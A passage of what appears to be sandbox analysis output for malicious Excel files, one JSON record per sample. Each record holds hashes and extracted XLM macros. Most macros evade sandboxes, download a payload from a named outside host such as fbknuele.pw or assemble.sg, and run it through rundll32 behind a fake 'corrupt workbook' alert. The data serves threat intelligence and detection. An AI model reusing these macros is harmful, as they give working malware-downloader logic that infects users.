,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"z8q8Kgxz3H\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2a0a78f85e2e36512e9e4cc9ed94dee7e1bfd942479716133227435632f2bcb1"},"analysis":{"reported":"2020-04-09T16:15:29Z","score":10},"files":[{"filename":"2a0a78f85e2e36512e9e4cc9ed94dee7e1bfd942479716133227435632f2bcb1","filesize":185344,"md5":"3f3a7caaa96d79e332e31405d38c81a0","sha1":"76c0f27644bcc11cd4425048a90822d1fdc12832","sha256":"2a0a78f85e2e36512e9e4cc9ed94dee7e1bfd942479716133227435632f2bcb1","sha512":"a4a7df10928d851b0ad3959f4268bbc01d9ffdd784a722cee2f9ac2efce924ddf54d2dadbe39144388149c42911875a4b98d4dd1276829cfbae5d621cd5509ee","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2a0a78f85e2e36512e9e4cc9ed94dee7e1bfd942479716133227435632f2bcb1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2a149163c3774e7470aff847c903020fda71079a707ca3fb5ff75a47ff74a45d"},"analysis":{"reported":"2020-04-09T16:15:29Z","score":10},"files":[{"filename":"2a149163c3774e7470aff847c903020fda71079a707ca3fb5ff75a47ff74a45d","filesize":167424,"md5":"3e4fa6898f476f475190de773a279d54","sha1":"04bbdaa94a7df6f5d1b6ecc822828b4aa989baa8","sha256":"2a149163c3774e7470aff847c903020fda71079a707ca3fb5ff75a47ff74a45d","sha512":"6cdc41d555a23b0d742adf2cdda60a4bacfdb5423270b862c8860d2e7e761bf9ea11d9b79ad437ac0a18c4e87f0df154b086b3ab7e10b749e89e245ec9fe0f9c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2a149163c3774e7470aff847c903020fda71079a707ca3fb5ff75a47ff74a45d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/fgwg24g24g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"67P5brfbxe\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$18C$2\u003c770,CLOSE(FALSE),)\nIF(R$19C$2\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$39C$10)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2a2224dee2fa6ac5c019557c6584c2ffecd8231f5c0ac17cb3f6ea77aeae7040"},"analysis":{"reported":"2020-04-09T16:15:29Z","score":10},"files":[{"filename":"2a2224dee2fa6ac5c019557c6584c2ffecd8231f5c0ac17cb3f6ea77aeae7040","filesize":167936,"md5":"42ddd5d3eefdda8a0411dff0f35d4fda","sha1":"7c2985a255f01731f6b39dc6cd1911c02bdb3b3c","sha256":"2a2224dee2fa6ac5c019557c6584c2ffecd8231f5c0ac17cb3f6ea77aeae7040","sha512":"a5c97869fd059b219a09ff3f0d3a128fe816ce192da138fb064131912cbfc43f6a6d0e7ccd4dd722e7a44b13f744b3171797da0d83901390bdbb02743137d89c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2a2224dee2fa6ac5c019557c6584c2ffecd8231f5c0ac17cb3f6ea77aeae7040.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"yXRtjTxSwT\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2a4071be8ec0921214603170d4a724f83c1fe7f897693176692ab5402fb8f419"},"analysis":{"reported":"2020-04-09T16:15:29Z","score":10},"files":[{"filename":"2a4071be8ec0921214603170d4a724f83c1fe7f897693176692ab5402fb8f419","filesize":116224,"md5":"8c793e11cd2a8ba073be5fa171e6f54e","sha1":"6ba3cf2f3dc339b116c88faac3990bcdb42daa5b","sha256":"2a4071be8ec0921214603170d4a724f83c1fe7f897693176692ab5402fb8f419","sha512":"cd10fe0d5af56a85385c62bebac52ea9865ac77a70e6a98b9bf59ca2547f19f3c8ddcf17087f2d7581b1d3c6b8ba323a0d2a12a0704b49a92f765d9be3c80137","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2a4071be8ec0921214603170d4a724f83c1fe7f897693176692ab5402fb8f419.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"fo6vTQdtYm\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2a458229a174bb75b0a43dbc588ce4dff8ecb51bfdc796656121484a783f38b4"},"analysis":{"reported":"2020-04-09T16:15:29Z","score":10},"files":[{"filename":"2a458229a174bb75b0a43dbc588ce4dff8ecb51bfdc796656121484a783f38b4","filesize":113664,"md5":"7be9e77eeb293d843cdc04135c448c54","sha1":"bf3c9393c040846826d79ec0843c836a06785f9e","sha256":"2a458229a174bb75b0a43dbc588ce4dff8ecb51bfdc796656121484a783f38b4","sha512":"b955fbf1aec077dd4bd3b92ae50acb3e527f44bf766f752485a58c411c35409d5e27b35b6f7dc876a9430e63291e0cc115c1d3916694effb547146ec9f6a41e1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2a458229a174bb75b0a43dbc588ce4dff8ecb51bfdc796656121484a783f38b4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"niS6CfmLks\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2a4a93b2d21ba4e6142ba3f5ef40c2c2912c35ac8bbb2e938f601ea6d6f8a42b"},"analysis":{"reported":"2020-04-09T16:15:29Z","score":10},"files":[{"filename":"2a4a93b2d21ba4e6142ba3f5ef40c2c2912c35ac8bbb2e938f601ea6d6f8a42b","filesize":226304,"md5":"c069dd3a33896d14899be7e229a57ca9","sha1":"ce5722605a5d8fff32dd523cfd639c36a652670e","sha256":"2a4a93b2d21ba4e6142ba3f5ef40c2c2912c35ac8bbb2e938f601ea6d6f8a42b","sha512":"c258d3410f10f061c22efd2f7fb1450823be9958f3564e005379e5020aa3f3d89f6e026fd7261c8e170e70cdc765915883d04ce89953f5448c0050b95d516366","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2a4a93b2d21ba4e6142ba3f5ef40c2c2912c35ac8bbb2e938f601ea6d6f8a42b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ddfspwxrb.club/fb2g424g"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"kk1MNyCwev\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2a6a1fafcebf3fa4cee923bf8747b62d84525aa2bf69a7202f392a12f99c2692"},"analysis":{"reported":"2020-04-09T16:15:30Z","score":10},"files":[{"filename":"2a6a1fafcebf3fa4cee923bf8747b62d84525aa2bf69a7202f392a12f99c2692","filesize":167936,"md5":"4347a5403202e32f613734c90574bb50","sha1":"daedf12aa073ebad6d5f415e8987c65ec7fce25f","sha256":"2a6a1fafcebf3fa4cee923bf8747b62d84525aa2bf69a7202f392a12f99c2692","sha512":"3ccf5d66c51ba42577db6c686f5eac77315497fda9584d48e59d1d037a98485b7701b050e0f11d8ca5f88ceb00eb2d875dca41a373d39621189da4241af02122","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2a6a1fafcebf3fa4cee923bf8747b62d84525aa2bf69a7202f392a12f99c2692.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"BUSrrhsKUA\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2a78d73b6c1960de38c69e10eccdfffc1ee0ebfb9f8c67cf22f9016be405916f"},"analysis":{"reported":"2020-04-09T16:15:30Z","score":10},"files":[{"filename":"2a78d73b6c1960de38c69e10eccdfffc1ee0ebfb9f8c67cf22f9016be405916f","filesize":185344,"md5":"e22aaeb382c2f9b0daa71026fd01671c","sha1":"35fa4c2c4dda9bf177334501f7048ae51c5cf2fc","sha256":"2a78d73b6c1960de38c69e10eccdfffc1ee0ebfb9f8c67cf22f9016be405916f","sha512":"3b310d2df1be81a4b2c41697a149037c30ecb4fb6d8501fa80b70c9c45a980f7af58d9031e65ce288e422164eceb61645d8aa5debdb2fd5ab8dc139139cc1f38","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2a78d73b6c1960de38c69e10eccdfffc1ee0ebfb9f8c67cf22f9016be405916f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2a7aa1113d374e6e3449233e47ab72d3b403a62b543c46162c4ebb1b6fdb9964"},"analysis":{"reported":"2020-04-09T16:15:30Z","score":10},"files":[{"filename":"2a7aa1113d374e6e3449233e47ab72d3b403a62b543c46162c4ebb1b6fdb9964","filesize":113152,"md5":"4ffcc17e5242ad2fa5eea86478cc7a66","sha1":"91976db239a57ba9ef5e41d19fefef68e6e9c734","sha256":"2a7aa1113d374e6e3449233e47ab72d3b403a62b543c46162c4ebb1b6fdb9964","sha512":"41fd1c7bd46a7c3f7c7c58db96ab1ab28cdd0cc57915bba6ba782e28931b01bd241951ed4bb113214f68c57dd01404c655c89f3f318a749cd7b59e4bf0f02ba5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2a7aa1113d374e6e3449233e47ab72d3b403a62b543c46162c4ebb1b6fdb9964.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/vdjfvfs7871f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"Wg3cXVzo38\",TRUE)\nRETURN()\nRETURN()\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$20C$11\u003c770,CLOSE(FALSE),)\nIF(R$21C$11\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2a8d9ceb9a6faa3453e9db3a1b18d3ef1a4eca1aeda9ff7be9bf0eefe4425fd6"},"analysis":{"reported":"2020-04-09T16:15:30Z","score":10},"files":[{"filename":"2a8d9ceb9a6faa3453e9db3a1b18d3ef1a4eca1aeda9ff7be9bf0eefe4425fd6","filesize":113664,"md5":"06cf746b9ba83eb52e40b1ecb4bb0a1b","sha1":"9577a2353b37d0a5d0c6538037076c6b88ba86eb","sha256":"2a8d9ceb9a6faa3453e9db3a1b18d3ef1a4eca1aeda9ff7be9bf0eefe4425fd6","sha512":"b4377e917d7007fe03fc4db91635ae5d59e42c23aa3471f0ae18f96bc446716a3f37a7a1540e6f7bd7c04389f796c904901668f5a0cdb98f1367fc8694a75c08","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2a8d9ceb9a6faa3453e9db3a1b18d3ef1a4eca1aeda9ff7be9bf0eefe4425fd6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"wBMxywyu0A\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2a9e14afe2c068d91ed4d68a0df7bde6580c7719f866352bfed25dafd131ffa7"},"analysis":{"reported":"2020-04-09T16:15:30Z","score":10},"files":[{"filename":"2a9e14afe2c068d91ed4d68a0df7bde6580c7719f866352bfed25dafd131ffa7","filesize":185344,"md5":"2d52c57df690ac5519ad09120268aa80","sha1":"46b27740737e046fb108b1f234f4278dd973af84","sha256":"2a9e14afe2c068d91ed4d68a0df7bde6580c7719f866352bfed25dafd131ffa7","sha512":"e9b9f52625f978c84752fa7f195264342218aaa255e4b661543af2a8ab51727948a85e3075623369dfd0d49f42dc2cfe0a2505696ab85e967c1b40003a9319af","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2a9e14afe2c068d91ed4d68a0df7bde6580c7719f866352bfed25dafd131ffa7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2aa9e690895bd08efe0bc1ea961e03f99fd366ac488464c1c7925523172cfaee"},"analysis":{"reported":"2020-04-09T16:15:30Z","score":10},"files":[{"filename":"2aa9e690895bd08efe0bc1ea961e03f99fd366ac488464c1c7925523172cfaee","filesize":212992,"md5":"5119cd90eba1ebb26b8563bf9d1e0646","sha1":"5dfcaeff4d7202c08b725a5d098e550f1bc522f0","sha256":"2aa9e690895bd08efe0bc1ea961e03f99fd366ac488464c1c7925523172cfaee","sha512":"70dd6add2106a950402ef481ca1ce8dd5235980b4b6a70382290dd55e54269958117c80131ef59b87352f82017e6c30f68b9b08fba212450050b674cf97a5d6c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2aa9e690895bd08efe0bc1ea961e03f99fd366ac488464c1c7925523172cfaee.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-front.php","https://cworld.top/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cworld.top/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6sga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"MM9DzzSjc8\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2ab0a98f8c73774e1d2d83a9cad78d2c6e818cb21f2edee5a3858a826af01163"},"analysis":{"reported":"2020-04-09T16:15:30Z","score":10},"files":[{"filename":"2ab0a98f8c73774e1d2d83a9cad78d2c6e818cb21f2edee5a3858a826af01163","filesize":185344,"md5":"750ac9c7c260d513a7342b6a6a065fa8","sha1":"0ff24c4c53ae726762f15951aa5526ec6e8423e7","sha256":"2ab0a98f8c73774e1d2d83a9cad78d2c6e818cb21f2edee5a3858a826af01163","sha512":"120eda2d9487470e8ffa9b0c6297e8256e369ee7b8563e9b27ab7331985abd13cfc35b8249629a3bdb6a4e05f79fbeafc773a0da7b51f2ef024bc619f5ef6a51","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2ab0a98f8c73774e1d2d83a9cad78d2c6e818cb21f2edee5a3858a826af01163.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2acb98477c3907ad6315f763728e70c146f446ecb6c8216abb1d0c32a76719d4"},"analysis":{"reported":"2020-04-09T16:15:30Z","score":10},"files":[{"filename":"2acb98477c3907ad6315f763728e70c146f446ecb6c8216abb1d0c32a76719d4","filesize":185344,"md5":"92b338c7bd430b7940668f08d24a8f0d","sha1":"07a31f1fd84b460a429914c5e98e1e8cc37e3b50","sha256":"2acb98477c3907ad6315f763728e70c146f446ecb6c8216abb1d0c32a76719d4","sha512":"d9fc7b32bbedebcb9d67d3b06581090bd3edc10afa92a2b03892d4afa625962021cb06444eaa2bed241ab8d33e0832680dce584655911c22296f346a0ed588bf","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2acb98477c3907ad6315f763728e70c146f446ecb6c8216abb1d0c32a76719d4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2ad897b5315f5662dae06dd1d0e5a1b238a54a94eeb048070a426cf1d5d760c5"},"analysis":{"reported":"2020-04-09T16:15:30Z","score":10},"files":[{"filename":"2ad897b5315f5662dae06dd1d0e5a1b238a54a94eeb048070a426cf1d5d760c5","filesize":168960,"md5":"856c3f96abc58a1d7fac7f20c1af190c","sha1":"12e5cb777960632932a4e3abeb38fb2a875ba3ba","sha256":"2ad897b5315f5662dae06dd1d0e5a1b238a54a94eeb048070a426cf1d5d760c5","sha512":"0d936cbf352fb212d8fdf5dd8207d6f9850c0dbc1d14159881cb34ca7ae81926da12c5af2c61e4002ad0a82471f8f95d9fc823419051ac9624e030bc361f9f19","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2ad897b5315f5662dae06dd1d0e5a1b238a54a94eeb048070a426cf1d5d760c5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"UFJRPIDEtJ\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2adc6e836c4ec0de2a601e6a57e76a2a77de0a9acbb7c921c7adf3e4176d2468"},"analysis":{"reported":"2020-04-09T16:15:30Z","score":10},"files":[{"filename":"2adc6e836c4ec0de2a601e6a57e76a2a77de0a9acbb7c921c7adf3e4176d2468","filesize":152576,"md5":"5eacae708645d074795c04d01fc2d4cc","sha1":"d2a00c55121066e57161d9dcb0450e60638299d0","sha256":"2adc6e836c4ec0de2a601e6a57e76a2a77de0a9acbb7c921c7adf3e4176d2468","sha512":"73fbb477611263be2eba0cc616c1b8a815b367a7f66fe83c44b0a208db0184143a96ebcb71d3ee6c82120e9352b4d23880e06bd4b4eacb35011e6d31f19fa491","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2adc6e836c4ec0de2a601e6a57e76a2a77de0a9acbb7c921c7adf3e4176d2468.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, 